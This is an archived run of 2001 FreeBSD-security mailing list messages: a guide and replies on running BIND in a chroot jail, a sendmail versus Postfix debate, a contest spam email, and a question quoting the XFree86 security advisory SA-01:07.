(khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 1300E37B684 for ; Thu, 1 Feb 2001 07:53:59 -0800 (PST) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id KAA76239; Thu, 1 Feb 2001 10:53:45 -0500 (EST) (envelope-from wollman) Date: Thu, 1 Feb 2001 10:53:45 -0500 (EST) From: Garrett Wollman Message-Id: <200102011553.KAA76239@khavrinen.lcs.mit.edu> To: Thomas Cannon Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind In-Reply-To: References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I think the fact that he puts his own money on the fact that there are no > exploitable flaws in qmail or his DNS implementation shows an > obvious That would be an assertion, not a fact. (And keep in mind that they same person has threatened to sue anyone who suggests that there actually might be security flaws in his software.) -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 7:55:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.sageian.com (ns.sage-consult.com [208.201.118.11]) by hub.freebsd.org (Postfix) with ESMTP id D1A4C37B491 for ; Thu, 1 Feb 2001 07:55:34 -0800 (PST) Received: from pricli012 (proxy.sageian.com [208.201.118.126]) by mail.sageian.com (Postfix) with SMTP id B8D9A6A904 for ; Thu, 1 Feb 2001 10:55:33 -0500 (EST) Message-ID: <03aa01c08c67$7f7c3320$4c00000a@sage> Reply-To: "Rossen Raykov" From: "Rossen Raykov" To: Subject: Ronning named in chroot env Date: Thu, 1 Feb 2001 10:56:11 -0500 Organization: SageConsult, Princeton MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, In case someone is interested in running named in chrooted environment on FreeBSD, below is my experience how this can be done. There are example settings for /etc/rc.conf allso. I provide this information with no warranty of any kind. Use it on yours one risk! First create the chroot directory where you will put named in. In the example settings I'll use /var/chroot/named Create the following directories in it: bin dev etc etc/namedb etc/namedb/* (depends on you named config) lib var var/run usr usr/sbin usr/libexec usr/lib tmp Copy the following files in it: bin/ldconfig (optional) etc/passwd etc/localtime etc/group etc/namedb/named.conf etc/namedb/cache etc/namedb/named.root etc/namedb/* (depends on you zones) var/run/named.pid (generated by named on startup so you do not need to copy it) usr/sbin/named usr/libexec/ld-elf.so.1 usr/libexec/named-xfer usr/lib/libc.so.4 usr/lib/libutil.so.3 links (depend on are you using the bind from the FreeBSD distribution or one from ports): etc/named.conf -> namedb/named.conf Create special file (mknod null c 2 2 root:wheel): dev/null Sockets (those will be created during runtime): dev/log var/run/ndc Settings in /etc/rc.conf # Start named in chroot environment named_enable="YES" named_program="chroot" named_flags="/var/chroot/named /usr/sbin/named -u bind -g bind" # Create loging soket for named in the sandbox syslogd_flags="-s -l /var/chroot/named/dev/log" Notes about etc/passwd in the chrooted environment: There is not a good reason this to be you real passwd file. Create something like: root:*:0:0:Charlie &:/root:/bin/csh bind:*:53:53:Bind Sandbox:/:/sbin/nologin keep the same UID fro bind like in the original passwd file. Use pwd_mkdb to create the shadow password file. Do not simply copy the original one! group file can be something like: wheel:*:0:root bind:*:53: Finally be careful with the rights in the newly created directory structure. For this one can look at the rights and the ownership of the original ones. To start named in the new environment - restart the box ;) or stop syslogd and start it with the options specified above. syslogd -s -l /var/chroot/named/dev/log Verify that syslog is working correctly (I have to restart it 2 times?!). start named: chroot /var/chroot/named /usr/sbin/named -u bind -g bind That's all! Rossen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 8: 5:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id ED3FF37B503 for ; Thu, 1 Feb 2001 08:05:13 -0800 (PST) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.1/8.11.1) with ESMTP id f11G5vd82414; Thu, 1 Feb 2001 11:05:57 -0500 (EST) (envelope-from rsimmons@wlcg.com) Date: Thu, 1 Feb 2001 11:05:56 -0500 (EST) From: Rob Simmons To: Rossen Raykov Cc: freebsd-security@FreeBSD.ORG Subject: Re: Ronning named in chroot env In-Reply-To: <03aa01c08c67$7f7c3320$4c00000a@sage> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You can keep the number of libs that you need to put in the chroot down by compiling bind statically. There is a website about this here: http://www.psionic.com/papers/dns/dns-openbsd/ If you are using the ports collection to build bind, just add the following line to the Makefile: CFLAGS= -static The site is primarily about OpenBSD, but things work (almost) the same in FreeBSD :) Robert Simmons Systems Administrator http://www.wlcg.com/ On Thu, 1 Feb 2001, Rossen Raykov wrote: > Hi, > > In case someone is interested in running named in chrooted environment on > FreeBSD, below is my experience how this can be done. > There are example settings for /etc/rc.conf allso. > > I provide this information with no warranty of any kind. > Use it on yours one risk! > > First create the chroot directory where you will put named in. > In the example settings I'll use /var/chroot/named > > Create the following directories in it: > bin > dev > etc > etc/namedb > etc/namedb/* (depends on you named config) > lib > var > var/run > usr > usr/sbin > usr/libexec > usr/lib > tmp > > Copy the following files in it: > > bin/ldconfig (optional) > etc/passwd > etc/localtime > etc/group > etc/namedb/named.conf > etc/namedb/cache > etc/namedb/named.root > etc/namedb/* (depends on you zones) > var/run/named.pid (generated by named on startup so you do not need to copy > it) > usr/sbin/named > usr/libexec/ld-elf.so.1 > usr/libexec/named-xfer > usr/lib/libc.so.4 > usr/lib/libutil.so.3 > > links (depend on are you using the bind from the FreeBSD distribution or one > from ports): > etc/named.conf -> namedb/named.conf > > Create special file (mknod null c 2 2 root:wheel): > dev/null > > Sockets (those will be created during runtime): > dev/log > var/run/ndc > > Settings in /etc/rc.conf > # Start named in chroot environment > named_enable="YES" > named_program="chroot" > named_flags="/var/chroot/named /usr/sbin/named -u bind -g bind" > # Create loging soket for named in the sandbox > syslogd_flags="-s -l /var/chroot/named/dev/log" > > Notes about etc/passwd in the chrooted environment: > There is not a good reason this to be you real passwd file. > Create something like: > > root:*:0:0:Charlie &:/root:/bin/csh > bind:*:53:53:Bind Sandbox:/:/sbin/nologin > > keep the same UID fro bind like in the original passwd file. > Use pwd_mkdb to create the shadow password file. > Do not simply copy the original one! > > group file can be something like: > > wheel:*:0:root > bind:*:53: > > Finally be careful with the rights in the newly created directory structure. > For this one can look at the rights and the ownership of the original ones. > > To start named in the new environment - restart the box ;) > or stop syslogd and start it with the options specified above. > > syslogd -s -l /var/chroot/named/dev/log > > Verify that syslog is working correctly (I have to restart it 2 times?!). > > start named: > chroot /var/chroot/named /usr/sbin/named -u bind -g bind > > That's all! > > Rossen > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 8:48:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from topsecret.net (unknown [216.19.133.97]) by hub.freebsd.org (Postfix) with SMTP id 256BB37B67D for ; Thu, 1 Feb 2001 08:48:05 -0800 (PST) Received: from pacific.net128.101.101.10.in-addr.arpa by topsecret.net with SMTP (MDaemon.v2.7.SP5.R) for ; Thu, 01 Feb 2001 11:46:29 -0500 Date: Thu, 1 Feb 2001 11:46:43 -0500 (EST) From: "[gill]" X-Sender: gill@pacific.int.topsecret.net To: Dragos Ruiu Cc: Christopher Farley , Fenix , freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG Subject: Re: sendmail vs. postfix question In-Reply-To: <01020103331409.27656@smp.kyx.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-MDaemon-Deliver-To: freebsd-security@FreeBSD.ORG X-Return-Path: gill@topsecret.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There was an interview with W Venema this week on http://securityportal.com/closet/closet20010131.html very interesting stuff. --gill -- This is my ~/.signature file. It is the digital equivalent of a bumpersticker. Remember? When you said: ->On Wed, 31 Jan 2001, Christopher Farley wrote: ->> Fenix (fenix@xs4some.net) wrote: ->> ->> > I have a little question about sendmail vs. postfix .... ->> > Are there any known recent problms with sendmail security ? ->> > what about postfix ? ->> [snip snip snip] ->As far as security, given how much I rely on it, I recently(last year) decided ->to re-audit its code, and after a couple of days spent looking for format ->strings and other stuff I decided to discontinue the audit... Mr. Venema's code ->is so rigorous that it even passes _internal_ data between routines through ->filtering and cleaning functions (how paranoid is that :-) if that's any ->indication of how it's built up. -> ->I personally think very highly of it. (Besides, I really would be fine ->if I never have to look at another arcane sendmail ruleset ever ->again... :-P ) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 8:58:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from sasami.jurai.net (sasami.jurai.net [63.67.141.99]) by hub.freebsd.org (Postfix) with ESMTP id 79FA237B67D; Thu, 1 Feb 2001 08:58:21 -0800 (PST) Received: from localhost (scanner@localhost) by sasami.jurai.net (8.9.3/8.8.7) with ESMTP id LAA85518; Thu, 1 Feb 2001 11:58:12 -0500 (EST) Date: Thu, 1 Feb 2001 11:58:12 -0500 (EST) From: To: "[gill]" Cc: Dragos Ruiu , Christopher Farley , Fenix , freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG Subject: Re: sendmail vs. postfix question In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 1 Feb 2001, [gill] wrote: > There was an interview with W Venema this week on > http://securityportal.com/closet/closet20010131.html That was a short but good read. I wish it would of been a bit longer. Oh and someone IS working on a Postfix book :-) ============================================================================= -Chris Watson (316) 326-3862 | FreeBSD Consultant, FreeBSD Geek Work: scanner@jurai.net | Open Systems Inc., Wellington, Kansas Home: scanner@deceptively.shady.org | http://open-systems.net ============================================================================= WINDOWS: "Where do you want to go today?" LINUX: "Where do you want to go tommorow?" BSD: "Are you guys coming or what?" ============================================================================= irc.openprojects.net #FreeBSD -Join the revolution! ICQ: 20016186 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 9: 2:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id DA69F37B67D for ; Thu, 1 Feb 2001 09:02:17 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id SAA31308; Thu, 1 Feb 2001 18:02:02 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: "Rossen Raykov" Cc: Subject: Re: Ronning named in chroot env References: <03aa01c08c67$7f7c3320$4c00000a@sage> From: Dag-Erling Smorgrav Date: 01 Feb 2001 18:02:02 +0100 In-Reply-To: "Rossen Raykov"'s message of "Thu, 1 Feb 2001 10:56:11 -0500" Message-ID: Lines: 11 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Rossen Raykov" writes: > In case someone is interested in running named in chrooted environment on > FreeBSD, below is my experience how this can be done. > [good example of how not to do it] Step-by-step instructions can be found starting about halfway through http://www.freebsd.org/cgi/getmsg.cgi?fetch=293748+0+current/freebsd-security DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 9: 3:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluerose.windmoon.nu (c255152-a.plstn1.sfba.home.com [24.176.132.48]) by hub.freebsd.org (Postfix) with ESMTP id BE5AD37B69B for ; Thu, 1 Feb 2001 09:03:02 -0800 (PST) Received: from localhost (fengyue@localhost) by bluerose.windmoon.nu (8.11.1/8.10.2) with ESMTP id f11H2tD42146; Thu, 1 Feb 2001 09:02:55 -0800 (PST) Date: Thu, 1 Feb 2001 09:02:55 -0800 (PST) From: FengYue To: Rossen Raykov Cc: freebsd-security@FreeBSD.ORG Subject: Re: Ronning named in chroot env In-Reply-To: <03aa01c08c67$7f7c3320$4c00000a@sage> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 1 Feb 2001, Rossen Raykov wrote: > Hi, > > In case someone is interested in running named in chrooted environment on > FreeBSD, below is my experience how this can be done. > There are example settings for /etc/rc.conf allso. Actually, all I did was: named -t /etc/namedb -u bind -g bind named.conf that seems to work just fine. Just make sure /etc/namedb/s and files under it are all owned by bind:bind. I'm using the named compiled from /usr/src/usr.sbin/named. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 9:15:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 7092337B6A2 for ; Thu, 1 Feb 2001 09:15:25 -0800 (PST) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id SAA31404; Thu, 1 Feb 2001 18:15:17 +0100 (CET) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: FengYue Cc: Rossen Raykov , freebsd-security@FreeBSD.ORG Subject: Re: Ronning named in chroot env References: From: Dag-Erling Smorgrav Date: 01 Feb 2001 18:15:16 +0100 In-Reply-To: FengYue's message of "Thu, 1 Feb 2001 09:02:55 -0800 (PST)" Message-ID: Lines: 22 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org FengYue writes: > Actually, all I did was: > > named -t /etc/namedb -u bind -g bind named.conf > > that seems to work just fine. Only if your named.conf has 'directory "/";' in the options section, and you don't have any slave zones, and you're not interested in any log messages your name server produces. Come to think of it, the fact that named is now unable to log error messages is probably the reason why you think it works just fine :) > Just make sure /etc/namedb/s and files > under it are all owned by bind:bind. ...and for extra paranoia, make sure everything else in /etc/namedb is owned by root:wheel and not writable by anyone - maybe even schg. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 9:26:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from bluerose.windmoon.nu (c255152-a.plstn1.sfba.home.com [24.176.132.48]) by hub.freebsd.org (Postfix) with ESMTP id C565137B491 for ; Thu, 1 Feb 2001 09:26:20 -0800 (PST) Received: from localhost (fengyue@localhost) by bluerose.windmoon.nu (8.11.1/8.10.2) with ESMTP id f11HQ6s42199; Thu, 1 Feb 2001 09:26:06 -0800 (PST) Date: Thu, 1 Feb 2001 09:26:06 -0800 (PST) From: FengYue To: Dag-Erling Smorgrav Cc: Rossen Raykov , freebsd-security@FreeBSD.ORG Subject: Re: Ronning named in chroot env In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 1 Feb 2001, Dag-Erling Smorgrav wrote: > Only if your named.conf has 'directory "/";' in the options section, > and you don't have any slave zones, and you're not interested in any > log messages your name server produces. Come to think of it, the fact > that named is now unable to log error messages is probably the reason > why you think it works just fine :) Yes, it doesn't have any slave zones, but I do miss the logs. I will use your patch then:) BTW, you have a typo for the link: http://people.freebsd.org/~des/software/> there is an extra '>' after software/ Thanks... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 10:13:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from inetworx.pcgameauthority.com (154.160.20.216.fastpoint.net [216.20.160.154]) by hub.freebsd.org (Postfix) with ESMTP id B1D0437B491; Thu, 1 Feb 2001 10:13:08 -0800 (PST) Received: from maximus (maximus.pcgameauthority.com [192.168.10.4]) by inetworx.pcgameauthority.com (Postfix) with SMTP id 39BF29501; Thu, 1 Feb 2001 10:14:46 -0800 (PST) Message-ID: <001401c08c7a$bc3eb9a0$040aa8c0@pcgameauthority.com> Reply-To: "Andre Hall" From: "Andre Hall" To: , References: <20010201103331.L53804@kens.com> Subject: Re: sendmail vs. postfix question Date: Thu, 1 Feb 2001 10:13:53 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I thought this was just about Postfix and Sendmail. I do agree that Qmail is easy to setup as well. I will reiterate that my comments were in regards to the Postfix and Sendmail comparison so the argument is not null, it's valid. ----- Original Message ----- From: "Robin S. Socha" To: ; Sent: Thursday, February 01, 2001 7:33 AM Subject: Re: sendmail vs. postfix question > * Cliff Sarginson [010201 10:13]: > >> I once was faced with the same dilemma as you were. I finally decide > >> to the Postfix way have not regretted my decision one bit. It was > >> the easiest and fastest configuration I had experienced, a definite > >> plus over Sendmail. > > Null argument, since the same applies to every other MTA, particularly > qmail. > > > I want to endorse the comments below. > > No. You want to endorse this and fix your quoting. And while we're at > it, don't think for a minute about Cc:ing me: > http://learn.to/edit_messages > > > The author of Postfix has produced a realy solid, fast and > > secure mail system. You may be interested to know he also > > authored tcp-wrappers and the (in)famous satan program. > > He also personally answers many of the questions on the > > postfix-users@postfix.org mailling list. > > Wietse Venema is also extremely nice and friendly. /Un/fortunately, that > has not much to do with security ;-) Anyway, postfix and qmail are > indeed the MTAs of choice if you're looking for secure and fast ones. If > you intend to run mailing lists, qmail's ezmlm is, however, /the/ #1 > choice. Reply-to set. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 10:26:23 2001 Delivered-To: freebsd-security@freebsd.org Received: from hand.dotat.at (sfo-gw.covalent.net [207.44.198.62]) by hub.freebsd.org (Postfix) with ESMTP id A9C8737B684 for ; Thu, 1 Feb 2001 10:26:03 -0800 (PST) Received: from fanf by hand.dotat.at with local (Exim 3.20 #3) id 14OOPw-000Acb-00; Thu, 01 Feb 2001 18:25:12 +0000 Date: Thu, 1 Feb 2001 18:25:12 +0000 From: Tony Finch To: Neil Blakey-Milner Cc: Matt Dillon , Chris Johnson , Przemyslaw Frasunek , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:18.bind Message-ID: <20010201182512.R70673@hand.dotat.at> References: <200101312123.f0VLNL134920@freefall.freebsd.org> <20010201014819.H675@riget.scene.pl> <20010131200142.A90211@palomine.net> <200102010154.f111sYE23275@earth.backplane.com> <20010201120218.A10087@rapier.smartspace.co.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010201120218.A10087@rapier.smartspace.co.za> Organization: Covalent Technologies, Inc Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Neil Blakey-Milner wrote: > >It might be an idea to actually research djbdns, consider its design, >history, and coding standards, and then make a judgement. If you do look at the code then I hope you really like magic numbers and shun comments and meaningful type names. Tony. -- f.a.n.finch fanf@covalent.net dot@dotat.at "Because all you of Earth are idiots!" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 11:41:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from cocoa.globalgold.co.uk (cocoa.globalgold.co.uk [212.250.240.8]) by hub.freebsd.org (Postfix) with ESMTP id 1B3D137B698; Thu, 1 Feb 2001 11:39:05 -0800 (PST) Received: from stephen (tnt-18-68.easynet.co.uk [212.134.224.68]) by cocoa.globalgold.co.uk (8.9.1/8.9.1) with SMTP id TAA08633; Thu, 1 Feb 2001 19:03:06 GMT From: "Mailer" To: Subject: Win a top of the range iMac, Palm Pilot or Discman Date: Thu, 1 Feb 2001 18:58:28 -0000 Message-ID: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0026_01C08C80.F6699130" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0026_01C08C80.F6699130 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Connect to your future and start 2001 as a winner Win a top of the range iMac, Palm Pilot or Discman All you have to do to win is register with planetgraduate, the new international site for students, graduates and employers. Simply click here to get started Take just a few seconds to register and enter our draw to win either a Palm Pilot or Sony Discman. Take a few minutes more and enter your CV with planetgraduate's CV Builder and you could win the incredibly cool iMac and be connected to the Internet in a couple of clicks. Enter our prize draw today to win one of these top prizes:- A top of the range iMac One of two Palm Pilots One of three Portable CD players Discman iMac Palm Pilot PS Double your chances of winning a Discman or Palm Pilot by helping us let your friends know about this great competition. The draw will take place on Friday 23rd February 2001 Prizes may differ from models shown To unsubscribe from this email, reply to this email with the word 'unsubscribe' only in the subject line or send an email to unsubscribe@planetgraduate.com get a job now | study net . the village | relax & enjoy . top deals | behind the scenes contact us . privacy policy . terms of use . copyright ------=_NextPart_000_0026_01C08C80.F6699130 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

3D"go 3Dplanetgraduate
     
Connect to your future and start 2001 as a=20 winner
Win a top = of the range=20 iMac, Palm Pilot or Discman
 

All you=20 have to do to win is register with planetgraduate, the new = international=20 site for students, graduates and employers.
Simply=20 click here to get started

Take just = a few=20 seconds to register and enter our draw to win either a Palm Pilot = or Sony=20 Discman. Take a few minutes more and enter your CV with = planetgraduate's=20 CV Builder and you could win the incredibly cool iMac and be = connected to=20 the Internet in a couple of clicks.

   
Enter our prize = draw today to=20 win one of these top prizes:-
A=20 top of the range iMac
One of two Palm = Pilots=20
One of=20 three Portable CD players
 
  3D"WIN 3D"Win 3D"Win  
  Discman=20 iMac Palm = Pilot  
 
  PS = Double=20 your chances of winning a Discman or Palm Pilot by helping us let = your=20 friends know about this great competition.
 
The draw=20 will take place on Friday 23rd February 2001
 
Prizes may differ from models shown

To unsubscribe = from this=20 email, reply to this email with the word 'unsubscribe' only in the = subject=20 line
or send an email to unsubscribe@planetgraduate= .com
 
  get a=20 job now  |  study=20 net  .  the=20 village  |  relax=20 & enjoy  .  top=20 deals&nbs= p; |  behind= =20 the scenes    
  contact=20 us  .  privacy=20 policy  .  terms=20 of use  .  copyright
------=_NextPart_000_0026_01C08C80.F6699130-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Feb 1 11:57:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from ike-ext.ab.videon.ca (ike-ext.ab.videon.ca [206.75.216.35]) by hub.freebsd.org (Postfix) with SMTP id 4486437B491 for ; Thu, 1 Feb 2001 11:57:28 -0800 (PST) Received: (qmail 26048 invoked from network); 1 Feb 2001 19:57:27 -0000 Received: from unknown (HELO e5e0aftd3903e) ([24.108.62.177]) (envelope-sender ) by ike-ext.ab.videon.ca (qmail-ldap-1.03) with SMTP for ; 1 Feb 2001 19:57:27 -0000 Message-ID: <005301c08c89$33722260$b13e6c18@videon.ca> From: "Paul Andrews" To: References: <200101300909.f0U99qv87528@freefall.freebsd.org> Subject: Re: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 Date: Thu, 1 Feb 2001 12:57:26 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Does this issue affect only those that installed the XFree86 3.3.6 port or does it also affect those who have installed FreeBSD 4.2 RELEASE. If it does affect the RELEASE version what is the easiest why to fix this problem, without upgrading to XFree86 4.01. Paul Andrews Internet: andrews@powersurfr.com ----- Original Message ----- From: "FreeBSD Security Advisories" To: "FreeBSD Security Advisories" Sent: Tuesday, January 30, 2001 2:09 AM Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-01:07.xfree86 > -----BEGIN PGP SIGNED MESSAGE----- > > ============================================================================ = > FreeBSD-SA-01:07 Security Advisory > FreeBSD, Inc. > > Topic: Multiple XFree86 3.3.6 vulnerabilities > > Category: ports > Module: XFree86-3.3.6, XFree86-aoutlibs > Announced: 2001-01-23 > Credits: Chris Evans > Michal Zalewski > Affects: Ports collection prior to the correction date. > Corrected: 2000-10-24 (XFree86-3.3.6) > Vendor status: Fixed in XFree86 4.0.1, no patches released by vendor. > FreeBSD only: NO > > I. Background > > XFree86 is a popular X server. It exists in three versions in the > FreeBSD ports collection: 3.3.6 and 4.0.2, as well as a.out libraries > based on XFree86 3.3.3. > > II. Problem Description > > The XFree86-3.3.6 port, versions prior to 3.3.6_1, has multiple > vulnerabilities that may allow local or remote users to cause a denial > of service attack against a vulnerable X server. Additionally, local > users may be able to obtain elevated privileges under certain > circumstances. > > X server DoS: > Remote users can, by sending a malformed packet to port 6000 TCP, > cause the victim's X server to freeze for several minutes. During > the freeze, the mouse does not move and the screen does not update > in any way. In addition, the keyboard is unresponsive, including > console-switch and kill-server key combinations. Non-X processes, > such as remote command-line logins and non-X applications, are > unaffected by the freeze. > > Xlib holes: > Due to various coding flaws in libX11, privileged (setuid/setgid) > programs linked against libX11 may allow local users to obtain > elevated privileges. > > libICE DoS: > Due to inadequate bounds checking in libICE, a denial of service > exists with any application using libICE to listen on a network port > for network services. > > The XFree86-aoutlibs port contains the XFree86 libraries from the > 3.3.3 release of XFree86, in a.out format suitable for use with > applications in the legacy a.out binaryformat, most notably being the > FreeBSD native version of Netscape. It is unknown whether Netscape is > vulnerable to the problems described in this advisory, but it believed > that the only potential vulnerability is the libICE denial-of-service > condition described above. > > The XFree86 and XFree86-aoutlibs ports are not installed by default > (although XFree86 is available as an installation option in the > FreeBSD installer), nor are they "part of FreeBSD" as such: they are > part of the FreeBSD ports collection, which contains almost 4500 > third-party applications in a ready-to-install format. The ports > collections shipped with FreeBSD 3.5.1 and 4.1.1 contain these problem > since they were discovered after the releases, but the XFree86 problem > was corrected prior to the release of FreeBSD 4.2. At the time of > advisory release, the XFree86-aoutlibs port has not been corrected. > > FreeBSD makes no claim about the security of these third-party > applications, although an effort is underway to provide a security > audit of the most security-critical ports. > > III. Impact > > Local or remote users may cause a denial of service attack against an > X server or certain X applications. Local users may obtain elevated > privileges with certain X applications. > > If you have not chosen to install the XFree86 3.3.6 port/package or > the XFree86-aoutlibs port/package, or you are running XFree86 4.0.1 or > later, then your system is not vulnerable to this problem. > > IV. Workaround > > Deinstall the XFree86-3.3.6 and XFree86-aoutlibs ports/packages, if > you you have installed them. > > Note that any statically linked binaries which make use of the > vulnerable XFree86 routines may still be vulnerable to the problems > after deinstallation of the port/package. However due to the > difficulty of developing a reliable scanning utility for such binaries > no such utility is provided. > > V. Solution > > One of the following: > > 1) Upgrade your entire ports collection and rebuild the XFree86-3.3.6 > port. > > 2) Deinstall the old package and install an XFree86-4.0.2 package > obtained from: > > [i386] > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/x11/XFree86-4 .0.2_5.tgz > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/x11/XFree86-4 .0.2_5.tgz > ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/x11/XFree86- 4.0.2_5.tgz > > [alpha] > Packages are not automatically generated for the alpha architecture at > this time due to lack of build resources. > > NOTE: XFree86-3.3.6 packages are no longer made available, only the > newer XFree86-4.0.2 packages. > > Note also that the XFree86-aoutlibs port has not yet been fixed: there > is currently no solution to the problem other than removing the > port/package and recompiling any dependent software to use ELF > libraries, or switching to an ELF-based version of the software, if > available (e.g. the BSD/OS or Linux versions of Netscape, as an > alternative to the FreeBSD native version). The potential impact of > the vulnerabilities to the local environment may be deemed not > sufficiently great to warrant this 